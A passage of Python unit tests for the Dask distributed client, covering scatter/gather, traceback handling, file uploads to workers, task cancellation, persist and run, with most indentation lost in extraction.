@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_scatter_direct_broadcast_target(c, s, *workers):
futures = await c.scatter([123, 456], direct=True, workers=workers[0].address)
assert futures[0].key in workers[0].data
assert futures[1].key in workers[0].data
futures = await c.scatter(
[123, 456],
direct=True,
broadcast=True,
workers=[w.address for w in workers[:3]],
)
    # A bare generator expression is always truthy, so wrap it in all() to
    # actually check that every future landed on every targeted worker.
    assert all(
        f.key in w.data and s.workers[w.address] in s.tasks[f.key].who_has
        for f in futures
        for w in workers[:3]
    )
@gen_cluster(client=True, nthreads=[])
async def test_scatter_direct_empty(c, s):
with pytest.raises((ValueError, TimeoutError)):
await c.scatter(123, direct=True, timeout=0.1)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 5)
async def test_scatter_direct_spread_evenly(c, s, *workers):
futures = []
for i in range(10):
future = await c.scatter(i, direct=True)
futures.append(future)
assert all(w.data for w in workers)
@pytest.mark.parametrize("direct", [True, False])
@pytest.mark.parametrize("broadcast", [True, False])
def test_scatter_gather_sync(c, direct, broadcast):
futures = c.scatter([1, 2, 3], direct=direct, broadcast=broadcast)
results = c.gather(futures, direct=direct)
assert results == [1, 2, 3]
delayed(inc)(1).compute(direct=direct)
@gen_cluster(client=True)
async def test_gather_direct(c, s, a, b):
futures = await c.scatter([1, 2, 3])
data = await c.gather(futures, direct=True)
assert data == [1, 2, 3]
@gen_cluster(client=True)
async def test_many_submits_spread_evenly(c, s, a, b):
L = [c.submit(inc, i) for i in range(10)]
await wait(L)
assert a.data and b.data
@gen_cluster(client=True)
async def test_traceback(c, s, a, b):
x = c.submit(div, 1, 0)
tb = await x.traceback()
assert any("x / y" in line for line in pluck(3, traceback.extract_tb(tb)))
@gen_cluster(client=True)
async def test_get_traceback(c, s, a, b):
try:
await c.get({"x": (div, 1, 0)}, "x", sync=False)
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any("x / y" in line for line in L)
@gen_cluster(client=True)
async def test_gather_traceback(c, s, a, b):
x = c.submit(div, 1, 0)
try:
await c.gather(x)
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any("x / y" in line for line in L)
def test_traceback_sync(c):
x = c.submit(div, 1, 0)
tb = x.traceback()
assert any(
"x / y" in line
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str)
)
y = c.submit(inc, x)
tb2 = y.traceback()
assert set(pluck(3, traceback.extract_tb(tb2))).issuperset(
set(pluck(3, traceback.extract_tb(tb)))
)
z = c.submit(div, 1, 2)
tb = z.traceback()
assert tb is None
@gen_cluster(client=True)
async def test_upload_file(c, s, a, b):
def g():
import myfile
return myfile.f()
with save_sys_modules():
for value in [123, 456]:
with tmp_text("myfile.py", f"def f():\n return {value}") as fn:
await c.upload_file(fn)
x = c.submit(g, pure=False)
result = await x
assert result == value
@gen_cluster(client=True)
async def test_upload_file_refresh_delayed(c, s, a, b):
with save_sys_modules():
for value in [123, 456]:
with tmp_text("myfile.py", f"def f():\n return {value}") as fn:
await c.upload_file(fn)
sys.path.append(os.path.dirname(fn))
from myfile import f
b = delayed(f)()
bb = c.compute(b, sync=False)
result = await c.gather(bb)
assert result == value
@gen_cluster(client=True)
async def test_upload_file_no_extension(c, s, a, b):
with tmp_text("myfile", "") as fn:
await c.upload_file(fn)
@gen_cluster(client=True)
async def test_upload_file_zip(c, s, a, b):
def g():
import myfile
return myfile.f()
with save_sys_modules():
try:
for value in [123, 456]:
with tmp_text(
"myfile.py", f"def f():\n return {value}"
) as fn_my_file:
with zipfile.ZipFile("myfile.zip", "w") as z:
z.write(fn_my_file, arcname=os.path.basename(fn_my_file))
await c.upload_file("myfile.zip")
x = c.submit(g, pure=False)
result = await x
assert result == value
finally:
if os.path.exists("myfile.zip"):
os.remove("myfile.zip")
@gen_cluster(client=True)
async def test_upload_file_egg(c, s, a, b):
def g():
import package_1
import package_2
return package_1.a, package_2.b
    # c.upload_file tells each worker to:
    # - put this file in their local_directory
    # - modify their sys.path to include it
    # We don't care about the local_directory here, but we do care about
    # restoring the path afterwards.
with save_sys_modules():
for value in [123, 456]:
with tmpfile() as dirname:
os.mkdir(dirname)
with open(os.path.join(dirname, "setup.py"), "w") as f:
f.write("from setuptools import setup, find_packages\n")
f.write(
'setup(name="my_package", packages=find_packages(), version="{}")\n'.format(
value
)
)
# test a package with an underscore in the name
package_1 = os.path.join(dirname, "package_1")
os.mkdir(package_1)
with open(os.path.join(package_1, "__init__.py"), "w") as f:
f.write(f"a = {value}\n")
# test multiple top-level packages
package_2 = os.path.join(dirname, "package_2")
os.mkdir(package_2)
with open(os.path.join(package_2, "__init__.py"), "w") as f:
f.write(f"b = {value}\n")
# compile these into an egg
subprocess.check_call(
[sys.executable, "setup.py", "bdist_egg"], cwd=dirname
)
egg_root = os.path.join(dirname, "dist")
# first file ending with '.egg'
egg_name = [
fname for fname in os.listdir(egg_root) if fname.endswith(".egg")
][0]
egg_path = os.path.join(egg_root, egg_name)
await c.upload_file(egg_path)
os.remove(egg_path)
x = c.submit(g, pure=False)
result = await x
assert result == (value, value)
@gen_cluster(client=True)
async def test_upload_large_file(c, s, a, b):
assert a.local_directory
assert b.local_directory
with tmp_text("myfile", "abc") as fn:
with tmp_text("myfile2", "def") as fn2:
await c._upload_large_file(fn, remote_filename="x")
await c._upload_large_file(fn2)
for w in [a, b]:
assert os.path.exists(os.path.join(w.local_directory, "x"))
assert os.path.exists(os.path.join(w.local_directory, "myfile2"))
with open(os.path.join(w.local_directory, "x")) as f:
assert f.read() == "abc"
with open(os.path.join(w.local_directory, "myfile2")) as f:
assert f.read() == "def"
def test_upload_file_sync(c):
def g():
import myfile
return myfile.x
with tmp_text("myfile.py", "x = 123") as fn:
c.upload_file(fn)
x = c.submit(g)
assert x.result() == 123
@gen_cluster(client=True)
async def test_upload_file_exception(c, s, a, b):
with tmp_text("myfile.py", "syntax-error!") as fn:
with pytest.raises(SyntaxError):
await c.upload_file(fn)
def test_upload_file_exception_sync(c):
with tmp_text("myfile.py", "syntax-error!") as fn:
with pytest.raises(SyntaxError):
c.upload_file(fn)
@gen_cluster(client=True, nthreads=[])
async def test_upload_file_new_worker(c, s):
def g():
import myfile
return myfile.x
with tmp_text("myfile.py", "x = 123") as fn:
await c.upload_file(fn)
async with Worker(s.address):
x = await c.submit(g)
assert x == 123
@pytest.mark.skip
@gen_cluster()
async def test_multiple_clients(s, a, b):
a = await Client(s.address, asynchronous=True)
b = await Client(s.address, asynchronous=True)
x = a.submit(inc, 1)
y = b.submit(inc, 2)
assert x.client is a
assert y.client is b
xx = await x
yy = await y
assert xx == 2
assert yy == 3
z = a.submit(add, x, y)
assert z.client is a
zz = await z
assert zz == 5
await a.close()
await b.close()
@gen_cluster(client=True)
async def test_async_compute(c, s, a, b):
from dask.delayed import delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
[yy, zz, aa] = c.compute([y, z, 3], sync=False)
assert isinstance(yy, Future)
assert isinstance(zz, Future)
assert aa == 3
result = await c.gather([yy, zz])
assert result == [2, 0]
assert isinstance(c.compute(y), Future)
assert isinstance(c.compute([y]), (tuple, list))
@gen_cluster(client=True)
async def test_async_compute_with_scatter(c, s, a, b):
d = await c.scatter({("x", 1): 1, ("y", 1): 2})
x, y = d[("x", 1)], d[("y", 1)]
from dask.delayed import delayed
z = delayed(add)(delayed(inc)(x), delayed(inc)(y))
zz = c.compute(z)
[result] = await c.gather([zz])
assert result == 2 + 3
def test_sync_compute(c):
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
yy, zz = c.compute([y, z], sync=True)
assert (yy, zz) == (2, 0)
@gen_cluster(client=True)
async def test_remote_scatter_gather(c, s, a, b):
x, y, z = await c.scatter([1, 2, 3])
assert x.key in a.data or x.key in b.data
assert y.key in a.data or y.key in b.data
assert z.key in a.data or z.key in b.data
xx, yy, zz = await c.gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@gen_cluster(client=True)
async def test_remote_submit_on_Future(c, s, a, b):
x = c.submit(lambda x: x + 1, 1)
y = c.submit(lambda x: x + 1, x)
result = await y
assert result == 3
def test_start_is_idempotent(c):
c.start()
c.start()
c.start()
x = c.submit(inc, 1)
assert x.result() == 2
@gen_cluster(client=True)
async def test_client_with_scheduler(c, s, a, b):
assert s.nthreads == {a.address: a.nthreads, b.address: b.nthreads}
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(add, x, y)
result = await x
assert result == 1 + 1
result = await z
assert result == 1 + 1 + 1 + 2
A, B, C = await c.scatter([1, 2, 3])
AA, BB, xx = await c.gather([A, B, x])
assert (AA, BB, xx) == (1, 2, 2)
result = await c.get({"x": (inc, 1), "y": (add, "x", 10)}, "y", sync=False)
assert result == 12
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_allow_restrictions(c, s, a, b):
aws = s.workers[a.address]
    bws = s.workers[b.address]
x = c.submit(inc, 1, workers=a.ip)
await x
assert s.tasks[x.key].who_has == {aws}
assert not s.loose_restrictions
x = c.submit(inc, 2, workers=a.ip, allow_other_workers=True)
await x
assert s.tasks[x.key].who_has == {aws}
assert x.key in s.loose_restrictions
L = c.map(inc, range(3, 13), workers=a.ip, allow_other_workers=True)
await wait(L)
assert all(s.tasks[f.key].who_has == {aws} for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
x = c.submit(inc, 15, workers="127.0.0.3", allow_other_workers=True)
await x
assert s.tasks[x.key].who_has
assert x.key in s.loose_restrictions
L = c.map(inc, range(15, 25), workers="127.0.0.3", allow_other_workers=True)
await wait(L)
assert all(s.tasks[f.key].who_has for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
with pytest.raises(ValueError):
c.submit(inc, 1, allow_other_workers=True)
with pytest.raises(ValueError):
c.map(inc, [1], allow_other_workers=True)
with pytest.raises(TypeError):
c.submit(inc, 20, workers="127.0.0.1", allow_other_workers="Hello!")
with pytest.raises(TypeError):
c.map(inc, [20], workers="127.0.0.1", allow_other_workers="Hello!")
def test_bad_address():
with pytest.raises(OSError, match="connect"):
Client("123.123.123.123:1234", timeout=0.1)
with pytest.raises(OSError, match="connect"):
Client("127.0.0.1:1234", timeout=0.1)
def test_informative_error_on_cluster_type():
with pytest.raises(TypeError) as exc_info:
Client(LocalCluster)
assert "Scheduler address must be a string or a Cluster instance" in str(
exc_info.value
)
@gen_cluster(client=True)
async def test_long_error(c, s, a, b):
def bad(x):
raise ValueError("a" * 100000)
x = c.submit(bad, 10)
try:
await x
except ValueError as e:
assert len(str(e)) < 100000
tb = await x.traceback()
assert all(
len(line) < 100000
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str)
)
@gen_cluster(client=True)
async def test_map_on_futures_with_kwargs(c, s, a, b):
def f(x, y=10):
return x + y
futures = c.map(inc, range(10))
futures2 = c.map(f, futures, y=20)
results = await c.gather(futures2)
assert results == [i + 1 + 20 for i in range(10)]
future = c.submit(inc, 100)
future2 = c.submit(f, future, y=200)
result = await future2
assert result == 100 + 1 + 200
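# Helper classes for the serialization tests below: BadlySerializedObject
# pickles fine but raises TypeError when deserialized, while
# FatallySerializedObject exits the deserializing process outright.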
class BadlySerializedObject:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise TypeError("hello!")
class FatallySerializedObject:
def __getstate__(self):
return 1
def __setstate__(self, state):
print("This should never have been deserialized, closing")
import sys
sys.exit(0)
@gen_cluster(client=True)
async def test_badly_serialized_input(c, s, a, b):
o = BadlySerializedObject()
future = c.submit(inc, o)
futures = c.map(inc, range(10))
L = await c.gather(futures)
assert list(L) == list(map(inc, range(10)))
assert future.status == "error"
with pytest.raises(Exception) as info:
await future
assert "hello!" in str(info.value)
@pytest.mark.skip
@gen_test()
async def test_badly_serialized_input_stderr(capsys, c):
o = BadlySerializedObject()
future = c.submit(inc, o)
while True:
sleep(0.01)
out, err = capsys.readouterr()
if "hello!" in err:
break
assert future.status == "error"
def test_repr(loop):
funcs = [str, repr, lambda x: x._repr_html_()]
with cluster(nworkers=3, worker_kwargs={"memory_limit": "2 GiB"}) as (s, [a, b, c]):
with Client(s["address"], loop=loop) as c:
for func in funcs:
text = func(c)
assert c.scheduler.address in text
assert "threads=3" in text or "Total threads: </strong>" in text
assert "6.00 GiB" in text
if "<table" not in text:
assert len(text) < 80
for func in funcs:
text = func(c)
assert "No scheduler connected" in text
@gen_cluster(client=True)
async def test_repr_async(c, s, a, b):
c._repr_html_()
@gen_cluster(client=True, worker_kwargs={"memory_limit": None})
async def test_repr_no_memory_limit(c, s, a, b):
c._repr_html_()
@gen_test()
async def test_repr_localcluster():
cluster = await LocalCluster(
processes=False, dashboard_address=":0", asynchronous=True
)
client = await Client(cluster, asynchronous=True)
try:
text = client._repr_html_()
assert cluster.scheduler.address in text
assert is_valid_xml(client._repr_html_())
finally:
await client.close()
await cluster.close()
@gen_cluster(client=True)
async def test_forget_simple(c, s, a, b):
x = c.submit(inc, 1, retries=2)
y = c.submit(inc, 2)
z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
await wait([x, y, z])
assert not s.waiting_data.get(x.key)
assert not s.waiting_data.get(y.key)
assert set(s.tasks) == {x.key, y.key, z.key}
s.client_releases_keys(keys=[x.key], client=c.id)
assert x.key in s.tasks
s.client_releases_keys(keys=[z.key], client=c.id)
assert x.key not in s.tasks
assert z.key not in s.tasks
assert not s.tasks[y.key].dependents
s.client_releases_keys(keys=[y.key], client=c.id)
assert not s.tasks
@gen_cluster(client=True)
async def test_forget_complex(e, s, A, B):
a, b, c, d = await e.scatter(list(range(4)))
ab = e.submit(add, a, b)
cd = e.submit(add, c, d)
ac = e.submit(add, a, c)
acab = e.submit(add, ac, ab)
await wait([a, b, c, d, ab, ac, cd, acab])
assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
s.client_releases_keys(keys=[ab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
s.client_releases_keys(keys=[b.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac, cd, acab, a, c, d]}
s.client_releases_keys(keys=[acab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac, cd, a, c, d]}
assert b.key not in s.tasks
while b.key in A.data or b.key in B.data:
await asyncio.sleep(0.01)
s.client_releases_keys(keys=[ac.key], client=e.id)
assert set(s.tasks) == {f.key for f in [cd, a, c, d]}
@gen_cluster(client=True)
async def test_forget_in_flight(e, s, A, B):
delayed2 = partial(delayed, pure=True)
a, b, c, d = (delayed2(slowinc)(i) for i in range(4))
ab = delayed2(slowadd)(a, b, dask_key_name="ab")
cd = delayed2(slowadd)(c, d, dask_key_name="cd")
ac = delayed2(slowadd)(a, c, dask_key_name="ac")
acab = delayed2(slowadd)(ac, ab, dask_key_name="acab")
x, y = e.compute([ac, acab])
s.validate_state()
for i in range(5):
await asyncio.sleep(0.01)
s.validate_state()
s.client_releases_keys(keys=[y.key], client=e.id)
s.validate_state()
for k in [acab.key, ab.key, b.key]:
assert k not in s.tasks
@gen_cluster(client=True)
async def test_forget_errors(c, s, a, b):
x = c.submit(div, 1, 0)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([y])
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key in s.exceptions_blame
s.client_releases_keys(keys=[z.key], client=c.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[x.key], client=c.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[y.key], client=c.id)
assert x.key not in s.exceptions
assert x.key not in s.exceptions_blame
assert y.key not in s.exceptions_blame
assert z.key not in s.exceptions_blame
def test_repr_sync(c):
s = str(c)
r = repr(c)
assert c.scheduler.address in s
assert c.scheduler.address in r
assert str(2) in s # nworkers
assert "cores" in s or "threads" in s
@gen_cluster(client=True)
async def test_waiting_data(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
await wait([x, y, z])
assert not s.waiting_data.get(x.key)
assert not s.waiting_data.get(y.key)
@gen_cluster()
async def test_multi_client(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
assert set(s.client_comms) == {c.id, f.id}
x = c.submit(inc, 1)
y = f.submit(inc, 2)
y2 = c.submit(inc, 2)
assert y.key == y2.key
await wait([x, y])
assert s.wants_what == {
c.id: {x.key, y.key},
f.id: {y.key},
"fire-and-forget": set(),
}
assert s.who_wants == {x.key: {c.id}, y.key: {c.id, f.id}}
await c.close()
while c.id in s.wants_what:
await asyncio.sleep(0.01)
assert c.id not in s.wants_what
assert c.id not in s.who_wants[y.key]
assert x.key not in s.who_wants
await f.close()
while s.tasks:
await asyncio.sleep(0.01)
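# Helper run in a separate process by test_cleanup_after_broken_client_connection:
# it submits a task, keeps the resulting future alive, and then blocks, so the
# scheduler only drops the task once the process is terminated.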
def long_running_client_connection(address):
with pristine_loop():
c = Client(address)
x = c.submit(lambda x: x + 1, 10)
x.result()
sleep(100)
@gen_cluster()
async def test_cleanup_after_broken_client_connection(s, a, b):
proc = mp_context.Process(target=long_running_client_connection, args=(s.address,))
proc.daemon = True
proc.start()
while not s.tasks:
await asyncio.sleep(0.01)
proc.terminate()
while s.tasks:
await asyncio.sleep(0.01)
@gen_cluster()
async def test_multi_garbage_collection(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
x = c.submit(inc, 1)
y = f.submit(inc, 2)
y2 = c.submit(inc, 2)
assert y.key == y2.key
await wait([x, y])
x.__del__()
while x.key in a.data or x.key in b.data:
await asyncio.sleep(0.01)
assert s.wants_what == {c.id: {y.key}, f.id: {y.key}, "fire-and-forget": set()}
assert s.who_wants == {y.key: {c.id, f.id}}
y.__del__()
while x.key in s.wants_what[f.id]:
await asyncio.sleep(0.01)
await asyncio.sleep(0.1)
assert y.key in a.data or y.key in b.data
assert s.wants_what == {c.id: {y.key}, f.id: set(), "fire-and-forget": set()}
assert s.who_wants == {y.key: {c.id}}
y2.__del__()
while y.key in a.data or y.key in b.data:
await asyncio.sleep(0.01)
assert not any(v for v in s.wants_what.values())
assert not s.who_wants
await c.close()
await f.close()
@gen_cluster(client=True)
async def test__broadcast(c, s, a, b):
x, y = await c.scatter([1, 2], broadcast=True)
assert a.data == b.data == {x.key: 1, y.key: 2}
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test__broadcast_integer(c, s, *workers):
x, y = await c.scatter([1, 2], broadcast=2)
assert len(s.tasks[x.key].who_has) == 2
assert len(s.tasks[y.key].who_has) == 2
@gen_cluster(client=True)
async def test__broadcast_dict(c, s, a, b):
d = await c.scatter({"x": 1}, broadcast=True)
assert a.data == b.data == {"x": 1}
def test_broadcast(c, s, a, b):
x, y = c.scatter([1, 2], broadcast=True)
has_what = sync(c.loop, c.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
a["address"]: {x.key, y.key},
b["address"]: {x.key, y.key},
}
[z] = c.scatter([3], broadcast=True, workers=[a["address"]])
has_what = sync(c.loop, c.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
a["address"]: {x.key, y.key, z.key},
b["address"]: {x.key, y.key},
}
@gen_cluster(client=True)
async def test_proxy(c, s, a, b):
msg = await c.scheduler.proxy(msg={"op": "identity"}, worker=a.address)
assert msg["id"] == a.identity()["id"]
@gen_cluster(client=True)
async def test_cancel(c, s, a, b):
x = c.submit(slowinc, 1)
y = c.submit(slowinc, x)
while y.key not in s.tasks:
await asyncio.sleep(0.01)
await c.cancel([x])
assert x.cancelled()
assert "cancel" in str(x)
s.validate_state()
while not y.cancelled():
await asyncio.sleep(0.01)
assert not s.tasks
s.validate_state()
@gen_cluster(client=True)
async def test_cancel_tuple_key(c, s, a, b):
x = c.submit(inc, 1, key=("x", 0, 1))
await x
await c.cancel(x)
with pytest.raises(CancelledError):
await x
@gen_cluster()
async def test_cancel_multi_client(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
x = c.submit(slowinc, 1)
y = f.submit(slowinc, 1)
assert x.key == y.key
await c.cancel([x])
assert x.cancelled()
assert not y.cancelled()
while y.key not in s.tasks:
await asyncio.sleep(0.01)
out = await y
assert out == 2
with pytest.raises(CancelledError):
await x
await c.close()
await f.close()
@gen_cluster(client=True)
async def test_cancel_collection(c, s, a, b):
L = c.map(double, [[1], [2], [3]])
x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
await c.cancel(x)
await c.cancel([x])
assert all(f.cancelled() for f in L)
while s.tasks:
await asyncio.sleep(0.01)
def test_cancel_sync(c):
x = c.submit(slowinc, 1, key="x")
y = c.submit(slowinc, x, key="y")
z = c.submit(slowinc, y, key="z")
c.cancel([y])
start = time()
while not z.cancelled():
sleep(0.01)
assert time() < start + 30
assert x.result() == 2
z.cancel()
assert z.cancelled()
@gen_cluster(client=True)
async def test_future_type(c, s, a, b):
x = c.submit(inc, 1)
await wait([x])
assert x.type == int
assert "int" in str(x)
@gen_cluster(client=True)
async def test_traceback_clean(c, s, a, b):
x = c.submit(div, 1, 0)
try:
await x
except Exception as e:
f = e
exc_type, exc_value, tb = sys.exc_info()
while tb:
assert "scheduler" not in tb.tb_frame.f_code.co_filename
assert "worker" not in tb.tb_frame.f_code.co_filename
tb = tb.tb_next
@gen_cluster(client=True)
async def test_map_different_lengths(c, s, a, b):
assert len(c.map(add, [1, 2], [1, 2, 3])) == 2
def test_Future_exception_sync_2(loop, capsys):
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert dask.base.get_scheduler() == c.get
out, err = capsys.readouterr()
assert len(out.strip().split("\n")) == 1
assert dask.base.get_scheduler() != c.get
@gen_cluster(timeout=60, client=True)
async def test_async_persist(c, s, a, b):
from dask.delayed import Delayed, delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
w = delayed(add)(y, z)
yy, ww = c.persist([y, w])
assert type(yy) == type(y)
assert type(ww) == type(w)
assert len(yy.dask) == 1
assert len(ww.dask) == 1
assert len(w.dask) > 1
assert y.__dask_keys__() == yy.__dask_keys__()
assert w.__dask_keys__() == ww.__dask_keys__()
while y.key not in s.tasks and w.key not in s.tasks:
await asyncio.sleep(0.01)
assert s.who_wants[y.key] == {c.id}
assert s.who_wants[w.key] == {c.id}
yyf, wwf = c.compute([yy, ww])
yyy, www = await c.gather([yyf, wwf])
assert yyy == inc(1)
assert www == add(inc(1), dec(1))
assert isinstance(c.persist(y), Delayed)
assert isinstance(c.persist([y]), (list, tuple))
@gen_cluster(client=True)
async def test__persist(c, s, a, b):
pytest.importorskip("dask.array")
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = c.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy.__dask_keys__() == y.__dask_keys__()
g, h = c.compute([y, yy])
gg, hh = await c.gather([g, h])
assert (gg == hh).all()
def test_persist(c):
pytest.importorskip("dask.array")
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = c.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy.__dask_keys__() == y.__dask_keys__()
zz = yy.compute()
z = y.compute()
assert (zz == z).all()
@gen_cluster(timeout=60, client=True)
async def test_long_traceback(c, s, a, b):
from distributed.protocol.pickle import dumps
def deep(n):
if n == 0:
1 / 0
else:
return deep(n - 1)
x = c.submit(deep, 200)
await wait([x])
assert len(dumps(c.futures[x.key].traceback)) < 10000
assert isinstance(c.futures[x.key].exception, ZeroDivisionError)
@gen_cluster(client=True)
async def test_wait_on_collections(c, s, a, b):
L = c.map(double, [[1], [2], [3]])
x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
await wait(x)
assert all(f.key in a.data or f.key in b.data for f in L)
@gen_cluster(client=True)
async def test_futures_of_get(c, s, a, b):
x, y, z = c.map(inc, [1, 2, 3])
assert set(futures_of(0)) == set()
assert set(futures_of(x)) == {x}
assert set(futures_of([x, y, z])) == {x, y, z}
assert set(futures_of([x, [y], [[z]]])) == {x, y, z}
assert set(futures_of({"x": x, "y": [y]})) == {x, y}
b = db.Bag({("b", i): f for i, f in enumerate([x, y, z])}, "b", 3)
assert set(futures_of(b)) == {x, y, z}
sg = SubgraphCallable(
{"x": x, "y": y, "z": z, "out": (add, (add, (add, x, y), z), "in")},
"out",
("in",),
)
assert set(futures_of(sg)) == {x, y, z}
def test_futures_of_class():
da = pytest.importorskip("dask.array")
assert futures_of([da.Array]) == []
@gen_cluster(client=True)
async def test_futures_of_cancelled_raises(c, s, a, b):
x = c.submit(inc, 1)
await c.cancel([x])
with pytest.raises(CancelledError):
await x
with pytest.raises(CancelledError):
await c.get({"x": (inc, x), "y": (inc, 2)}, ["x", "y"], sync=False)
with pytest.raises(CancelledError):
c.submit(inc, x)
with pytest.raises(CancelledError):
c.submit(add, 1, y=x)
with pytest.raises(CancelledError):
c.map(add, [1], y=x)
assert "y" not in s.tasks
@pytest.mark.skip
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
async def test_dont_delete_recomputed_results(c, s, w):
x = c.submit(inc, 1) # compute first time
await wait([x])
x.__del__() # trigger garbage collection
await asyncio.sleep(0)
xx = c.submit(inc, 1) # compute second time
start = time()
while xx.key not in w.data: # data shows up
await asyncio.sleep(0.01)
assert time() < start + 1
while time() < start + (s.delete_interval + 100) / 1000: # and stays
assert xx.key in w.data
await asyncio.sleep(0.01)
@gen_cluster(nthreads=[], client=True)
async def test_fatally_serialized_input(c, s):
o = FatallySerializedObject()
future = c.submit(inc, o)
while not s.tasks:
await asyncio.sleep(0.01)
@pytest.mark.skip(reason="Use fast random selection now")
@gen_cluster(client=True)
async def test_balance_tasks_by_stacks(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
y = c.submit(inc, 2)
await wait(y)
assert len(a.data) == len(b.data) == 1
@gen_cluster(client=True)
async def test_run(c, s, a, b):
results = await c.run(inc, 1)
assert results == {a.address: 2, b.address: 2}
results = await c.run(inc, 1, workers=[a.address])
assert results == {a.address: 2}
results = await c.run(inc, 1, workers=[])
assert results == {}
@gen_cluster(client=True)
async def test_run_handles_picklable_data(c, s, a, b):
futures = c.map(inc, range(10))
await wait(futures)
def func():
return {}, set(), [], (), 1, "hello", b"100"
results = await c.run_on_scheduler(func)
assert results == func()
results = await c.run(func)
assert results == {w.address: func() for w in [a, b]}
def test_run_sync(c, s, a, b):
def func(x, y=10):
return x + y
result = c.run(func, 1, y=2)
assert result == {a["address"]: 3, b["address"]: 3}
result = c.run(func, 1, y=2, workers=[a["address"]])
assert result == {a["address"]: 3}
@gen_cluster(client=True)
async def test_run_coroutine(c, s, a, b):
results = await c.run(geninc, 1, delay=0.05)
assert results == {a.address: 2, b.address: 2}
results = await c.run(geninc, 1, delay=0.05, workers=[a.address])
assert results == {a.address: 2}
results = await c.run(geninc, 1, workers=[])
assert results == {}
with pytest.raises(RuntimeError, match="hello"):
await c.run(throws, 1)
results = await c.run(asyncinc, 2, delay=0.01)
assert results == {a.address: 3, b.address: 3}
def test_run_coroutine_sync(c, s, a, b):
result = c.run(geninc, 2, delay=0.01)
assert result == {a["address"]: 3, b["address"]: 3}
result = c.run(geninc, 2, workers=[a["address"]])
assert result == {a["address"]: 3}
t1 = time()
result = c.run(geninc, 2, delay=10, wait=False)
t2 = time()
assert result is None
assert t2 - t1 <= 1.0
@gen_cluster(client=True)
async def test_run_coroutine_deprecated(c, s, a, b):
async def foo():
return "bar"
with pytest.warns(FutureWarning, match="Client.run "):
results = await c.run_coroutine(foo)
assert results == {a.address: "bar", b.address: "bar"}
@gen_cluster(client=True)
async def test_run_exception(c, s, a, b):
class MyError(Exception):
pass
def raise_exception(dask_worker, addr):
if addr == dask_worker.address:
raise MyError("informative message")
return 123
with pytest.raises(MyError, match="informative message"):
await c.run(raise_exception, addr=a.address)
with pytest.raises(MyError, match="informative message"):
await c.run(raise_exception, addr=a.address, on_error="raise")
with pytest.raises(ValueError, match="on_error must be"):
await c.run(raise_exception, addr=a.address, on_error="invalid")
out = await c.run(raise_exception, addr=a.address, on_error="return")
assert isinstance(out[a.address], MyError)
assert out[b.address] == 123
out = await c.run(raise_exception, addr=a.address, on_error="ignore")
assert out == {b.address: 123}
@gen_cluster(client=True, config={"distributed.comm.timeouts.connect": "200ms"})
async def test_run_rpc_error(c, s, a, b):
a.stop()
with pytest.raises(OSError, match="Timed out trying to connect"):
await c.run(inc, 1)
with pytest.raises(OSError, match="Timed out trying to connect"):
await c.run(inc, 1, on_error="raise")
out = await c.run(inc, 1, on_error="return")
assert isinstance(out[a.address], OSError)
assert out[b.address] == 2
out = await c.run(inc, 1, on_error="ignore")
assert out == {b.address: 2}
def test_diagnostic_ui(loop):
with cluster() as (s, [a, b]):
a_addr = a["address"]
b_addr = b["address"]
with Client(s["address"], loop=loop) as c:
d = c.nthreads()
assert d == {a_addr: 1, b_addr: 1}
d = c.nthreads([a_addr])
assert d == {a_addr: 1}
d = c.nthreads(a_addr)
assert d == {a_addr: 1}
